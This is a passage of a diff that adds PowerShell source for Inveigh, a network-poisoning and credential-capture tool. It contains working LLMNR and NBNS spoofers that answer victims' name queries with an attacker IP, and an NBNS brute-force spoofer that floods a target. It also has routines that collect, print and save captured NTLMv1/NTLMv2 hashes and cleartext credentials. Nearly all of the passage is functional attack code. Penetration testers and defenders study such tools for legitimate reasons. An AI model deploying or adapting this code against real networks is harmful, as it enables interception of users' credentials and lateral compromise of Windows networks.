[System.Text.Encoding]::UTF8.GetBytes($HTTP_message) + + $HTTP_response = 0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20 + + $HTTP_response_status_code + + 0x20 + + $HTTP_response_phrase + + 0x0d,0x0a,0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73, + 0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d, + 0x0a,0x44,0x61,0x74,0x65,0x3a + + $HTTP_timestamp + + 0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20, + 0x74,0x65,0x78,0x74,0x2f,0x68,0x74,0x6d,0x6c,0x3b,0x20,0x63,0x68,0x61,0x72,0x73, + 0x65,0x74,0x3d,0x75,0x74,0x66,0x2d,0x38,0x0d,0x0a,0x43,0x6f,0x6e,0x74,0x65,0x6e, + 0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + + $HTTP_content_length_bytes + + 0x0d,0x0a + + $HTTP_message_bytes + } + + $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length) + $HTTP_stream.Flush() + Start-Sleep -m 10 + $HTTP_request_raw_URL_old = $HTTP_request_raw_URL + $HTTP_client_handle_old = $HTTP_client.Client.Handle + + if($HTTP_client_close) + { + $HTTP_client.Close() + + if($RunCount -gt 0 -and ($inveigh.NTLMv1_list.Count -ge $run_count_NTLMv1 -or $inveigh.NTLMv2_list.Count -ge $run_count_NTLMv2 -or $inveigh.cleartext_list.Count -ge $run_count_cleartext)) + { + $HTTP_listener.Stop() + $inveigh.console_queue.Add("Inveigh Unprivileged exited due to run count at $(Get-Date -format 's')") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Brute Force exited due to run count")]) + $inveigh.unprivileged_running = $false + break HTTP_listener_loop + } + + } + + } + else + { + $HTTP_client.Close() + $HTTP_client_close = $true + } + + } + + $HTTP_client.Close() + start-sleep -s 1 + $HTTP_listener.Server.blocking = $false + Start-Sleep -s 1 + $HTTP_listener.Server.Close() + Start-Sleep -s 1 + $HTTP_listener.Stop() +} + +$LLMNR_spoofer_scriptblock = +{ + param ($LLMNR_response_message,$SpooferIP,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$LLMNRTTL) + + $LLMNR_listener_endpoint = New-object System.Net.IPEndPoint ([IPAddress]::Any,5355) + $LLMNR_UDP_client = New-Object System.Net.Sockets.UdpClient 5355 + $LLMNR_multicast_group = [IPAddress]"224.0.0.252" + $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group) + $LLMNR_UDP_client.Client.ReceiveTimeout = 5000 + + while($inveigh.unprivileged_running) + { + $LLMNR_request_data = $LLMNR_UDP_client.Receive([Ref]$LLMNR_listener_endpoint) # need to switch to async + + if([System.BitConverter]::ToString($LLMNR_request_data[($LLMNR_request_data.Length - 4)..($LLMNR_request_data.Length - 3)]) -ne '00-1c') # ignore AAAA for now + { + $LLMNR_TTL_bytes = [System.BitConverter]::GetBytes($LLMNRTTL) + [Array]::Reverse($LLMNR_TTL_bytes) + + $LLMNR_response_packet = $LLMNR_request_data[0,1] + + 0x80,0x00,0x00,0x01,0x00,0x01,0x00,0x00,0x00,0x00 + + $LLMNR_request_data[12..$LLMNR_request_data.Length] + + $LLMNR_request_data[12..$LLMNR_request_data.Length] + + $LLMNR_TTL_bytes + + 0x00,0x04 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + $LLMNR_query_string = [Text.Encoding]::UTF8.GetString($LLMNR_request_data[13..($LLMNR_request_data[12] + 12)]) + $source_IP = $LLMNR_listener_endpoint.Address.IPAddressToString + + if(($LLMNR_request_data -and $LLMNR_listener_endpoint.Address.IPAddressToString -ne '0.0.0.0') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP)) + { + $LLMNR_destination_endpoint = New-Object Net.IPEndpoint($LLMNR_listener_endpoint.Address,$LLMNR_listener_endpoint.Port) + $LLMNR_UDP_client.Connect($LLMNR_destination_endpoint) + $LLMNR_UDP_client.Send($LLMNR_response_packet,$LLMNR_response_packet.Length) + $LLMNR_UDP_client.Close() + $LLMNR_UDP_client = new-Object System.Net.Sockets.UdpClient 5355 + $LLMNR_multicast_group = [IPAddress]"224.0.0.252" + $LLMNR_UDP_client.JoinMulticastGroup($LLMNR_multicast_group) + $LLMNR_UDP_client.Client.ReceiveTimeout = 5000 + $LLMNR_response_message = "- response sent" + } + else + { + + if($SpooferHostsReply -and $SpooferHostsReply -notcontains $LLMNR_query_string) + { + $LLMNR_response_message = "- $LLMNR_query_string is not on reply list" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $LLMNR_query_string) + { + $LLMNR_response_message = "- $LLMNR_query_string is on ignore list" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $LLMNR_response_message = "- $source_IP is not on reply list" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $LLMNR_response_message = "- $source_IP is on ignore list" + } + elseif($inveigh.IP_capture_list -contains $source_IP) + { + $LLMNR_response_message = "- previous capture from $source_IP" + } + else + { + $LLMNR_response_message = "- something went wrong" + } + + } + + if($LLMNR_request_data) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - LLMNR request for $LLMNR_query_string received from $source_IP $LLMNR_response_message")]) + } + + $LLMNR_request_data = "" + } + + } + + $LLMNR_UDP_client.Close() + } + +$NBNS_spoofer_scriptblock = +{ + param ($NBNS_response_message,$SpooferIP,$NBNSTypes,$SpooferHostsReply,$SpooferHostsIgnore,$SpooferIPsReply,$SpooferIPsIgnore,$NBNSTTL) + + $NBNS_listener_endpoint = New-Object System.Net.IPEndPoint ([IPAddress]::Broadcast,137) + $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137 + $NBNS_UDP_client.Client.ReceiveTimeout = 5000 + + while($inveigh.unprivileged_running) + { + $NBNS_request_data = $NBNS_UDP_client.Receive([Ref]$NBNS_listener_endpoint) # need to switch to async + + if([System.BitConverter]::ToString($NBNS_request_data[10..11]) -ne '00-01') + { + $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) + [Array]::Reverse($NBNS_TTL_bytes) + + $NBNS_response_packet = $NBNS_request_data[0,1] + + 0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 + + $NBNS_request_data[13..$NBNS_request_data.Length] + + $NBNS_TTL_bytes + + 0x00,0x06,0x00,0x00 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + 0x00,0x00,0x00,0x00 + + $source_IP = $NBNS_listener_endpoint.Address.IPAddressToString + $NBNS_query_type = [System.BitConverter]::ToString($NBNS_request_data[43..44]) + + switch ($NBNS_query_type) + { + + '41-41' + { + $NBNS_query_type = "00" + } + + '41-44' + { + $NBNS_query_type = "03" + } + + '43-41' + { + $NBNS_query_type = "20" + } + + '42-4C' + { + $NBNS_query_type = "1B" + } + + '42-4D' + { + $NBNS_query_type = "1C" + } + + '42-4E' + { + $NBNS_query_type = "1D" + } + + '42-4F' + { + $NBNS_query_type = "1E" + } + + } + + $NBNS_query = [System.BitConverter]::ToString($NBNS_request_data[13..($NBNS_request_data.Length - 4)]) + $NBNS_query = $NBNS_query -replace "-00","" + $NBNS_query = $NBNS_query.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $NBNS_query_string_encoded = New-Object System.String ($NBNS_query,0,$NBNS_query.Length) + $NBNS_query_string_encoded = $NBNS_query_string_encoded.Substring(0,$NBNS_query_string_encoded.IndexOf("CA")) + $NBNS_query_string_subtracted = "" + $NBNS_query_string = "" + $n = 0 + + do + { + $NBNS_query_string_sub = (([Byte][Char]($NBNS_query_string_encoded.Substring($n,1))) - 65) + $NBNS_query_string_subtracted += ([System.Convert]::ToString($NBNS_query_string_sub,16)) + $n += 1 + } + until($n -gt ($NBNS_query_string_encoded.Length - 1)) + + $n = 0 + + do + { + $NBNS_query_string += ([Char]([System.Convert]::ToInt16($NBNS_query_string_subtracted.Substring($n,2),16))) + $n += 2 + } + until($n -gt ($NBNS_query_string_subtracted.Length - 1) -or $NBNS_query_string.Length -eq 15) + + if (($NBNS_request_data -and $NBNS_listener_endpoint.Address.IPAddressToString -ne '255.255.255.255') -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and ( + !$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ( + $inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP) -and ($NBNSTypes -contains $NBNS_query_type)) + { + $NBNS_destination_endpoint = New-Object System.Net.IPEndpoint($NBNS_listener_endpoint.Address,137) + $NBNS_UDP_client.Connect($NBNS_destination_endpoint) + $NBNS_UDP_client.Send($NBNS_response_packet,$NBNS_response_packet.Length) + $NBNS_UDP_client.Close() + $NBNS_UDP_client = New-Object System.Net.Sockets.UdpClient 137 + $NBNS_UDP_client.Client.ReceiveTimeout = 5000 + $NBNS_response_message = "- response sent" + } + else + { + + if($NBNSTypes -notcontains $NBNS_query_type) + { + $NBNS_response_message = "- disabled NBNS type" + } + elseif($SpooferHostsReply -and $SpooferHostsReply -notcontains $NBNS_query_string) + { + $NBNS_response_message = "- $NBNS_query_string is not on reply list" + } + elseif($SpooferHostsIgnore -and $SpooferHostsIgnore -contains $NBNS_query_string) + { + $NBNS_response_message = "- $NBNS_query_string is on ignore list" + } + elseif($SpooferIPsReply -and $SpooferIPsReply -notcontains $source_IP) + { + $NBNS_response_message = "- $source_IP is not on reply list" + } + elseif($SpooferIPsIgnore -and $SpooferIPsIgnore -contains $source_IP) + { + $NBNS_response_message = "- $source_IP is on ignore list" + } + elseif($inveigh.IP_capture_list -contains $source_IP) + { + $NBNS_response_message = "- previous capture from $source_IP" + } + else + { + $NBNS_response_message = "- something went wrong" + } + + } + + if($NBNS_request_data) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - NBNS request for $NBNS_query_string<$NBNS_query_type> received from $source_IP $NBNS_response_message")]) + } + + $NBNS_request_data = "" + } + + } + + $NBNS_UDP_client.Close() + } + +$NBNS_bruteforce_spoofer_scriptblock = +{ + param ($SpooferIP,$NBNSBruteForceHost,$NBNSBruteForceTarget,$NBNSBruteForcePause,$NBNSTTL) + + $NBNSBruteForceHost = $NBNSBruteForceHost.ToUpper() + + $hostname_bytes = 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41, + 0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00 + + $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($NBNSBruteForceHost) + $hostname_encoded = [System.BitConverter]::ToString($hostname_encoded) + $hostname_encoded = $hostname_encoded.Replace("-","") + $hostname_encoded = [System.Text.Encoding]::UTF8.GetBytes($hostname_encoded) + $NBNS_TTL_bytes = [System.BitConverter]::GetBytes($NBNSTTL) + [Array]::Reverse($NBNS_TTL_bytes) + + for($i=0; $i -lt $hostname_encoded.Count; $i++) + { + + if($hostname_encoded[$i] -gt 64) + { + $hostname_bytes[$i] = $hostname_encoded[$i] + 10 + } + else + { + $hostname_bytes[$i] = $hostname_encoded[$i] + 17 + } + + } + + $NBNS_response_packet = 0x00,0x00,0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20 + + $hostname_bytes + + 0x00,0x20,0x00,0x01 + + $NBNS_TTL_bytes + + 0x00,0x06,0x00,0x00 + + ([System.Net.IPAddress][String]([System.Net.IPAddress]$SpooferIP)).GetAddressBytes() + + 0x00,0x00,0x00,0x00 + + $inveigh.console_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Starting NBNS brute force spoofer to resolve $NBNSBruteForceHost on $NBNSBruteForceTarget")]) + $NBNS_paused = $false + $NBNS_bruteforce_UDP_client = New-Object System.Net.Sockets.UdpClient(137) + $destination_IP = [System.Net.IPAddress]::Parse($NBNSBruteForceTarget) + $destination_point = New-Object Net.IPEndpoint($destination_IP,137) + $NBNS_bruteforce_UDP_client.Connect($destination_point) + + while($inveigh.unprivileged_running) + { + + :NBNS_spoofer_loop while (!$inveigh.hostname_spoof -and $inveigh.unprivileged_running) + { + + if($NBNS_paused) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Resuming NBNS brute force spoofer")]) + $NBNS_paused = $false + } + + for ($i = 0; $i -lt 255; $i++) + { + + for ($j = 0; $j -lt 255; $j++) + { + $NBNS_response_packet[0] = $i + $NBNS_response_packet[1] = $j + $NBNS_bruteforce_UDP_client.send($NBNS_response_packet,$NBNS_response_packet.Length) + + if($inveigh.hostname_spoof -and $NBNSBruteForcePause) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Pausing NBNS brute force spoofer")]) + $NBNS_paused = $true + break NBNS_spoofer_loop + } + + } + + } + + } + + Start-Sleep -m 5 + } + + $NBNS_bruteforce_UDP_client.Close() + } + +$control_unprivileged_scriptblock = +{ + param ($NBNSBruteForcePause,$RunTime) + + if($RunTime) + { + $control_timeout = New-TimeSpan -Minutes $RunTime + $control_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + } + + if($NBNSBruteForcePause) + { + $NBNS_pause = New-TimeSpan -Seconds $NBNSBruteForcePause + } + + while ($inveigh.unprivileged_running) + { + + if($RunTime) + { + + if($control_stopwatch.Elapsed -ge $control_timeout) + { + + if($inveigh.HTTP_listener.IsListening) + { + $inveigh.HTTP_listener.Stop() + $inveigh.HTTP_listener.Close() + } + + if($inveigh.unprivileged_running) + { + $inveigh.console_queue.Add("Inveigh Unprivileged exited due to run time at $(Get-Date -format 's')") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited due to run time")]) + Start-Sleep -m 5 + $inveigh.unprivileged_running = $false + } + + if($inveigh.relay_running) + { + $inveigh.console_queue.Add("Inveigh Relay exited due to run time at $(Get-Date -format 's')") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay exited due to run time")]) + Start-Sleep -m 5 + $inveigh.relay_running = $false + } + + if($inveigh.running) + { + $inveigh.console_queue.Add("Inveigh exited due to run time at $(Get-Date -format 's')") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to run time")]) + Start-Sleep -m 5 + $inveigh.running = $false + } + + } + } + + if($NBNSBruteForcePause -and $inveigh.hostname_spoof) + { + + if($inveigh.NBNS_stopwatch.Elapsed -ge $NBNS_pause) + { + $inveigh.hostname_spoof = $false + } + + } + + if($inveigh.file_output -and !$inveigh.running) + { + + while($inveigh.log_file_queue.Count -gt 0) + { + $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append + $inveigh.log_file_queue.RemoveAt(0) + } + + while($inveigh.NTLMv1_file_queue.Count -gt 0) + { + $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append + $inveigh.NTLMv1_file_queue.RemoveAt(0) + } + + while($inveigh.NTLMv2_file_queue.Count -gt 0) + { + $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append + $inveigh.NTLMv2_file_queue.RemoveAt(0) + } + + while($inveigh.cleartext_file_queue.Count -gt 0) + { + $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append + $inveigh.cleartext_file_queue.RemoveAt(0) + } + + } + + Start-Sleep -m 5 + } + } + +# End ScriptBlocks +# Begin Startup functions + +# HTTP Listener Startup function +function HTTPListener() +{ + $HTTP_runspace = [RunspaceFactory]::CreateRunspace() + $HTTP_runspace.Open() + $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $HTTP_powershell = [PowerShell]::Create() + $HTTP_powershell.Runspace = $HTTP_runspace + $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument( + $HTTPBasicRealm).AddArgument($HTTPIP).AddArgument($HTTPPort).Addargument($HTTPResponse).AddArgument( + $NBNSBruteForcePause).AddArgument($WPADAuth).AddArgument($WPADEmptyFile).AddArgument($WPADIP).AddArgument( + $WPADPort).AddArgument($WPADDirectHosts).AddArgument($WPADResponse).AddArgument($RunCount) > $null + $HTTP_powershell.BeginInvoke() > $null +} + +# LLMNR Spoofer Startup function +function LLMNRSpoofer() +{ + $LLMNR_spoofer_runspace = [RunspaceFactory]::CreateRunspace() + $LLMNR_spoofer_runspace.Open() + $LLMNR_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $LLMNR_spoofer_powershell = [PowerShell]::Create() + $LLMNR_spoofer_powershell.Runspace = $LLMNR_spoofer_runspace + $LLMNR_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $LLMNR_spoofer_powershell.AddScript($LLMNR_spoofer_scriptblock).AddArgument( + $LLMNR_response_message).AddArgument($SpooferIP).AddArgument($SpooferHostsReply).AddArgument( + $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument( + $LLMNRTTL) > $null + $LLMNR_spoofer_powershell.BeginInvoke() > $null +} + +# NBNS Spoofer Startup function +function NBNSSpoofer() +{ + $NBNS_spoofer_runspace = [RunspaceFactory]::CreateRunspace() + $NBNS_spoofer_runspace.Open() + $NBNS_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $NBNS_spoofer_powershell = [PowerShell]::Create() + $NBNS_spoofer_powershell.Runspace = $NBNS_spoofer_runspace + $NBNS_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $NBNS_spoofer_powershell.AddScript($NBNS_spoofer_scriptblock).AddArgument($NBNS_response_message).AddArgument( + $SpooferIP).AddArgument($NBNSTypes).AddArgument($SpooferHostsReply).AddArgument( + $SpooferHostsIgnore).AddArgument($SpooferIPsReply).AddArgument($SpooferIPsIgnore).AddArgument( + $NBNSTTL) > $null + $NBNS_spoofer_powershell.BeginInvoke() > $null +} + +# Spoofer Startup function +function NBNSBruteForceSpoofer() +{ + $NBNS_bruteforce_spoofer_runspace = [RunspaceFactory]::CreateRunspace() + $NBNS_bruteforce_spoofer_runspace.Open() + $NBNS_bruteforce_spoofer_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $NBNS_bruteforce_spoofer_powershell = [PowerShell]::Create() + $NBNS_bruteforce_spoofer_powershell.Runspace = $NBNS_bruteforce_spoofer_runspace + $NBNS_bruteforce_spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $NBNS_bruteforce_spoofer_powershell.AddScript($NBNS_bruteforce_spoofer_scriptblock).AddArgument( + $SpooferIP).AddArgument($NBNSBruteForceHost).AddArgument($NBNSBruteForceTarget).AddArgument( + $NBNSBruteForcePause).AddArgument($NBNSTTL) > $null + $NBNS_bruteforce_spoofer_powershell.BeginInvoke() > $null +} + +# Control Unprivileged Startup function +function ControlUnprivilegedLoop() +{ + $control_unprivileged_runspace = [RunspaceFactory]::CreateRunspace() + $control_unprivileged_runspace.Open() + $control_unprivileged_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) + $control_unprivileged_powershell = [PowerShell]::Create() + $control_unprivileged_powershell.Runspace = $control_unprivileged_runspace + $control_unprivileged_powershell.AddScript($shared_basic_functions_scriptblock) > $null + $control_unprivileged_powershell.AddScript($control_unprivileged_scriptblock).AddArgument( + $NBNSBruteForcePause).AddArgument($RunTime) > $null + $control_unprivileged_powershell.BeginInvoke() > $null +} + +# End Startup functions + +# Startup Enabled Services + +# HTTP Server Start +if($HTTP -eq 'Y') +{ + HTTPListener +} + +# LLMNR Spoofer Start +if($LLMNR -eq 'Y') +{ + LLMNRSpoofer +} + +# NBNS Spoofer Start +if($NBNS -eq 'Y') +{ + NBNSSpoofer +} + +# NBNSBruteForce Spoofer Start +if($NBNSBruteForce -eq 'Y') +{ + NBNSBruteForceSpoofer +} + +# Control Unprivileged Loop Start +if($NBNSBruteForcePause -or $RunTime -or $inveigh.file_output) +{ + ControlUnprivilegedLoop +} + +if($inveigh.console_output) +{ + + if($ConsoleStatus) + { + $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus + $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + } + + :console_loop while(($inveigh.unprivileged_running -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) + { + + while($inveigh.console_queue.Count -gt 0) + { + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + $inveigh.console_queue.RemoveAt(0) + } + else + { + + switch -wildcard ($inveigh.console_queue[0]) + { + + "* written to *" + { + + if($inveigh.file_output) + { + Write-Warning $inveigh.console_queue[0] + } + + $inveigh.console_queue.RemoveAt(0) + } + + "* for relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + "*SMB relay *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + "* local administrator *" + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + default + { + Write-Output $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + } + + } + + } + + if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout) + { + + if($inveigh.cleartext_list.Count -gt 0) + { + Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline) + $inveigh.cleartext_list.Sort() + + foreach($unique_cleartext in $inveigh.cleartext_list) + { + if($unique_cleartext -ne $unique_cleartext_last) + { + Write-Output($unique_cleartext + $inveigh.newline) + } + + $unique_cleartext_last = $unique_cleartext + } + + Start-Sleep -m 5 + } + else + { + Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline) + } + + if($inveigh.NTLMv1_list.Count -gt 0) + { + Write-Output("$(Get-Date -format 's') - Current unique NTLMv1 challenge/response captures:" + $inveigh.newline) + $inveigh.NTLMv1_list.Sort() + + foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) + { + $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) + + if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) + { + Write-Output($unique_NTLMv1 + $inveigh.newline) + } + + $unique_NTLMv1_account_last = $unique_NTLMv1_account + } + + $unique_NTLMv1_account_last = "" + Start-Sleep -m 5 + Write-Output("$(Get-Date -format 's') - Current NTLMv1 IP addresses and usernames:" + $inveigh.newline) + + foreach($NTLMv1_username in $inveigh.NTLMv1_username_list) + { + Write-Output($NTLMv1_username + $inveigh.newline) + } + + Start-Sleep -m 5 + } + else + { + Write-Output("$(Get-Date -format 's') - No NTLMv1 challenge/response hashes have been captured" + $inveigh.newline) + } + + if($inveigh.NTLMv2_list.Count -gt 0) + { + Write-Output("$(Get-Date -format 's') - Current unique NTLMv2 challenge/response captures:" + $inveigh.newline) + $inveigh.NTLMv2_list.Sort() + + foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) + { + $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) + + if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) + { + Write-Output($unique_NTLMv2 + $inveigh.newline) + } + + $unique_NTLMv2_account_last = $unique_NTLMv2_account + } + + $unique_NTLMv2_account_last = "" + Start-Sleep -m 5 + Write-Output("$(Get-Date -format 's') - Current NTLMv2 IP addresses and usernames:" + $inveigh.newline) + + foreach($NTLMv2_username in $inveigh.NTLMv2_username_list) + { + Write-Output($NTLMv2_username + $inveigh.newline) + } + + } + else + { + Write-Output("$(Get-Date -format 's') - No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline) + } + + $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + + } + + if($inveigh.console_input) + { + + if([Console]::KeyAvailable) + { + $inveigh.console_output = $false + BREAK console_loop + } + + } + + Start-Sleep -s 1 + } + +} + +if($inveigh.file_output -and !$inveigh.running) +{ + + while($inveigh.log_file_queue.Count -gt 0) + { + $inveigh.log_file_queue[0]|Out-File $inveigh.log_out_file -Append + $inveigh.log_file_queue.RemoveAt(0) + } + + while($inveigh.NTLMv1_file_queue.Count -gt 0) + { + $inveigh.NTLMv1_file_queue[0]|Out-File $inveigh.NTLMv1_out_file -Append + $inveigh.NTLMv1_file_queue.RemoveAt(0) + } + + while($inveigh.NTLMv2_file_queue.Count -gt 0) + { + $inveigh.NTLMv2_file_queue[0]|Out-File $inveigh.NTLMv2_out_file -Append + $inveigh.NTLMv2_file_queue.RemoveAt(0) + } + + while($inveigh.cleartext_file_queue.Count -gt 0) + { + $inveigh.cleartext_file_queue[0]|Out-File $inveigh.cleartext_out_file -Append + $inveigh.cleartext_file_queue.RemoveAt(0) + } + +} + +} +#End Invoke-InveighBruteForce + +function Stop-Inveigh +{ +<# +.SYNOPSIS +Stop-Inveigh will stop all running Inveigh functions. +#> + +if($inveigh) +{ + + if($inveigh.running -or $inveigh.relay_running -or $inveigh.unprivileged_running) + { + + if($inveigh.HTTP_listener.IsListening) + { + $inveigh.HTTP_listener.Stop() + $inveigh.HTTP_listener.Close() + } + + if($inveigh.unprivileged_running) + { + $inveigh.unprivileged_running = $false + Start-Sleep -s 5 + Write-Output("Inveigh Unprivileged exited at $(Get-Date -format 's')") + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Unprivileged exited") > $null + + if($inveigh.file_output) + { + "$(Get-Date -format 's') - Inveigh Unprivileged exited" | Out-File $Inveigh.log_out_file -Append + } + + } + + if($inveigh.relay_running) + { + $inveigh.relay_running = $false + Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null + + if($inveigh.file_output) + { + "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append + } + + } + + if($inveigh.running) + { + $inveigh.running = $false + Write-Output("Inveigh exited at $(Get-Date -format 's')") + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null + + if($inveigh.file_output) + { + "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append + } + + } + + } + else + { + Write-Output("There are no running Inveigh functions") + } + + if($inveigh.HTTPS) + { + & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null + + try + { + $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") + $certificate_store.Open('ReadWrite') + $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0] + $certificate_store.Remove($certificate) + $certificate_store.Close() + } + catch + { + Write-Output("SSL Certificate Deletion Error - Remove Manually") + $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null + + if($inveigh.file_output) + { + "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append + } + + } + } + + $inveigh.HTTP = $false + $inveigh.HTTPS = $false +} +else +{ + Write-Output("There are no running Inveigh functions")|Out-Null +} + +} + +function Get-Inveigh +{ +<# +.SYNOPSIS +Get-Inveigh will get stored Inveigh data from memory. + +.PARAMETER Console +Get queued console output. This is also the default if no parameters are set. + +.PARAMETER Log +Get log entries. + +.PARAMETER NTLMv1 +Get captured NTLMv1 challenge/response hashes. + +.PARAMETER NTLMv1Unique +Get the first captured NTLMv1 challenge/response for each unique account. + +.PARAMETER NTLMv1Usernames +Get IP addresses and usernames for captured NTLMv2 challenge/response hashes. + +.PARAMETER NTLMv2 +Get captured NTLMv1 challenge/response hashes. + +.PARAMETER NTLMv2Unique +Get the first captured NTLMv2 challenge/response for each unique account. + +.PARAMETER NTLMv2Usernames +Get IP addresses and usernames for captured NTLMv2 challenge/response 